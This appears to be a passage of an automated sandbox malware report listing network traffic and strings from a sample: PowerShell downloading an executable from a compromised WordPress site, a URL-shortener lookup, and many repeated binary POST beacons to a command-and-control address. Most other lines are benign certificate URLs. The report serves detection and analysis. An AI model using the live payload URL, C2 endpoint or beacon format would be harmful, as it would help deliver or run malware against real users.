                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00404ED4 recv,
                Source: global trafficHTTP traffic detected: GET /wp-content/themes/index/QPR-3067.exe HTTP/1.1Host: bighoreca.nlConnection: Keep-Alive
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: cutt.ly
                Source: unknownHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 176Connection: close
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://bighoreca.nl
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://bighoreca.nl/wp-content/themes/index/QPR-3067.exe
                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0L
                Source: powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0c
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D
                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabn
                Source: powershell.exe, 00000006.00000002.2098107246.000000000025D000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enf
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
                Source: powershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: powershell.exe, 00000006.00000002.2107223409.000000001D360000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://status.rapidssl.com0
                Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: powershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://www.acabogacia.org0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
